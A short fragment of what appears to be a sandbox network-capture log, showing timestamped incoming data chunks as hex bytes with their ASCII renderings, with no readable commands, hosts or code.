Ascii: {$m)(6B$3h?G'$3F8([#zegvyF_TTQ!r&Bfw'6$HQhKLDyhD7]-5njF>M4HvG9<Q^Gv87G':Mj-#T W4=<i<Rb}#vWev`e0aHU6#
2025-01-14 16:14:24 UTC	16384	IN	Data Raw: aa b7 0d c5 50 84 a2 5f aa d9 f7 4e 87 0e f4 cb 2a da 2c 5c a5 a3 88 80 67 33 3a 62 de b3 1f 24 49 14 df c5 98 c8 94 97 3d 6f 3b 96 84 11 81 a2 93 98 0d 7a 97 95 d0 53 0c 78 97 f9 ad 78 20 49 21 5a 44 ae 28 77 fe 12 bb e5 20 68 1f 54 fa 75 cb e2 a4 c0 76 fa 6f 68 5b e4 95 05 ff 2c 5a 76 54 22 39 23 87 0d fa 70 f1 05 fd 92 7c 92 1c 9c 03 c7 e1 b6 40 e2 31 95 e5 36 20 f5 70 13 32 ff 85 92 a0 03 bb 06 23 eb 14 6c e2 88 ca 26 a4 fe 06 37 c2 9b cd 66 73 87 13 e3 80 71 5b f3 4d d6 e9 c5 1e e3 b0 31 d7 26 c6 d2 d9 c5 67 4d 02 28 50 37 b5 07 14 41 3a a1 6d e9 d0 e1 76 7b fb dd 0f 3a e4 38 d5 44 0f 14 cf f0 4b fa 78 b3 d4 13 46 45 aa fc 82 f3 ae 5f 70 74 97 63 66 ee 29 97 20 04 55 73 2e 39 44 93 99 05 de 3a 89 1f 1c b4 0c 9f a3 66 1f 38 c6 b6 48 4b 38 1e cd 49 64 Data Ascii: P_N*,\g3:b$I=o;zSxx I!ZD(w hTuvoh[,ZvT"9#p\|@16 p2#l&7fsq[M1&gM(P7A:mv{:8DKxFE_ptcf) Us.9D:f8HK8Id
2025-01-14 16:14:24 UTC	743	IN	Data Raw: 6b 96 45 d4 a3 4c 6e d9 5b 12 60 2f b8 a7 9d d9 fa 19 4d 9c 3e 71 e6 6d 8c f3 ab c0 72 f6 c6 0e ac a1 6e c6 3f 34 19 62 f7 c7 71 e4 8c 5c 65 2d b5 4d 85 b1 87 38 63 10 16 fd 75 db db 6e a0 0d af 9e 38 82 f9 0d 76 96 4b c6 8b 94 95 46 8c dd 81 0f dd 3a e3 42 39 47 c7 d3 01 6f e3 f6 f7 3d 76 35 c3 99 3e 54 67 ed a9 d6 53 a5 b5 f1 4b 49 39 8c 58 7b 48 25 db f9 cb 7d e5 d5 05 fe 52 31 96 40 78 50 db 67 d0 cb 4a 1b 98 14 16 33 f1 9e 48 61 9f 13 9f 59 f6 b8 4b fd a1 21 79 b6 07 f1 df ce 84 8e 37 0a 8b 1a f0 b3 6c d8 a5 5e bd ba 8d f3 ca 5d a3 d0 51 a6 b0 3e 97 a2 e7 6f a8 a5 bb f9 a4 ea 1c 55 d6 c7 b5 36 8c 1a c4 87 56 65 13 ab 7a ec 8c b4 4f 5e 32 52 25 17 34 9f d7 23 b7 a6 41 56 c0 7d 97 95 e7 74 ec 78 4c 8c 4c bb 71 70 79 77 35 a2 71 23 58 4e 1b 97 07 7d b5 Data Ascii: kELn[`/M>qmrn?4bq\e-M8cun8vKF:B9Go=v5>TgSKI9X{H%}R1@xPgJ3HaYK!y7l^]Q>oU6VezO^2R%4#AV}txLLqpyw5q#XN}